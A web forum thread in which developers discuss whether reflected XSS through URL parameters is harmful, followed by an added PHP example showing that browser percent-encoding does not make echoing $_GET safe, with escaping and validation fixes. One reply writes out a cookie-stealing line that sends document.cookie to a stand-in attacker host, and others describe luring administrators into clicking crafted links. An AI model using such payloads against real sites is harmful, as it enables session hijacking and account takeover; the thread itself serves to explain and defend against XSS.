Thread: XSS Attacks

  1. #1
    SitePoint Zealot
    Join Date
    Mar 2008
    Posts
    151

    XSS Attacks

    Am I right in thinking that XSS attacks can only do harm if the script is inserted into the webpage, as opposed to just a URL exploit...

    e.g. a url xss hole like this is pretty pointless

    http://www.somesite.com/page.php?number=<script>alert('xss');</script>

    Even if it does display 'xss', is there much a hacker can do with this type of exploit?

    I know that if the code was inserted into a database then XSS attacks can be used to hijack your session etc... but can much be done if the script is just run in the browser?

  2. #2
    SitePoint Zealot
    Join Date
    Sep 2008
    Posts
    199
    Hacker can steal cookies.

    location.href = "http://www.hackersite.com/sniffer.php?cookies=" + escape(document.cookie);

  3. #3
    SitePoint Zealot
    Join Date
    Sep 2008
    Posts
    199
    Also, if the cookie is linked with the IP and does not work from another host, then it is still possible to perform some action,
    like hitting a button in the admin area of the site or changing some user's password.

    Gmail was hacked with XSS and some guy lost his domain.

  4. #4
    SitePoint Zealot
    Join Date
    Mar 2008
    Posts
    151
    Yeah, but surely a hacker can't steal someone else's cookie if the code isn't inserted into the actual webpage (database). If the code is just passed into the URL and not inserted into the database, then surely it's just in the browser that the code gets executed; if the page is refreshed then the code will disappear, as it's not inserted anywhere.

  5. #5
    SitePοint Troll disgracian
    Join Date
    Aug 2006
    Location
    Samsara
    Posts
    451
    It can if the nasty person plants the URL somewhere that an unsuspecting victim is likely to click on. URLs with the promise of naked celebrities accomplish this quite well.

    Hacking requires just as much knowledge of the human condition as it does on the technical side.

    Cheers,
    D.

  6. #6
    SitePoint Zealot
    Join Date
    Jul 2008
    Location
    Norway
    Posts
    100
    I recommend you to download and test the free version of Web Security Scanner from Acunetix.
    Acunetix scans all web applications and server for XSS, SQL injections and much more!

    You can read more about the application at this site.

  7. #7
    SitePoint Wizard bronze trophy
    Join Date
    Jul 2008
    Posts
    5,757
    Keep in mind that if they can make some JavaScript execute, they can make any JavaScript execute. This means they can completely control/rewrite your entire HTML page, steal cookies, and make the user do things they don't want to. It can sure make your website look like you're doing bad things, and it may make search engines prompt virus warnings in search results.

  8. #8
    SitePoint Zealot
    Join Date
    Sep 2008
    Posts
    199
    Quote: Originally Posted by Shark3y3s
    Yeah, but surely a hacker can't steal someone else's cookie if the code isn't inserted into the actual webpage (database). If the code is just passed into the URL and not inserted into the database, then surely it's just in the browser that the code gets executed; if the page is refreshed then the code will disappear, as it's not inserted anywhere.

    They do not have to save it in the db. They have to make someone click the link.
    E.g. you can send a PM to the forum administrator with the link and ask him to click it. You can complain about some thread and include a link with XSS. The administrator will click the link, but the link will make hits in the administrator's pages (change passwords or give someone admin rights).
    Last edited by max7; Sep 24, 2008 at 02:36.

  9. #9
    SitePoint Enthusiast
    Join Date
    Jun 2006
    Posts
    70
    Sorry if I don't quite understand here. Suppose I enter this URL:

    Code:
    http://www.somesite.com/page.php?number=<script>alert('xss');</script>
    then my browser automatically changes it to:

    Code:
    http://www.somesite.com/page.php?number=%3Cscript%3Ealert('xss');%3C/script%3E
    Does it mean my script is safe, even if I echo $_GET['number']?

  10. #10
    SitePoint Zealot
    Join Date
    Sep 2008
    Posts
    199
    No.
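
Added example, not part of any post in this thread: it shows why the browser's percent-encoding from post #9 does not make `echo $_GET['number']` safe, since PHP URL-decodes the query string before the script sees it, and puts the unescaped output beside two corrected forms. The function names and the use of `parse_str()` to stand in for a real request are assumptions made for illustration.

```php
<?php
// Constructed sample: the query string exactly as the browser sends it
// after percent-encoding (taken from the URL in post #9).
$rawQuery = "number=%3Cscript%3Ealert('xss');%3C/script%3E";

// PHP builds $_GET by URL-decoding the query string. parse_str() applies
// the same decoding, so $get here holds what $_GET would hold.
parse_str($rawQuery, $get);

// Vulnerable: the decoded value goes into the HTML unchanged, so the
// browser receives a real <script> element.
function render_unsafe(array $get): string
{
    return "<p>Number: " . $get['number'] . "</p>";
}

// Fix 1: escape for the HTML context at output time. The markup
// characters become entities and are displayed as text, not executed.
function render_escaped(array $get): string
{
    $value = htmlspecialchars($get['number'] ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>Number: " . $value . "</p>";
}

// Fix 2: the parameter is meant to be a number, so validate it as one
// and reject everything else before it reaches the page.
function render_validated(array $get): string
{
    $n = filter_var($get['number'] ?? '', FILTER_VALIDATE_INT);
    if ($n === false) {
        return "<p>Invalid number</p>";
    }
    return "<p>Number: " . $n . "</p>";
}

echo "decoded value : ", $get['number'], "\n";
echo "unsafe output : ", render_unsafe($get), "\n";
echo "escaped output: ", render_escaped($get), "\n";
echo "validated     : ", render_validated($get), "\n";
echo "valid input   : ", render_validated(['number' => '42']), "\n";
```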

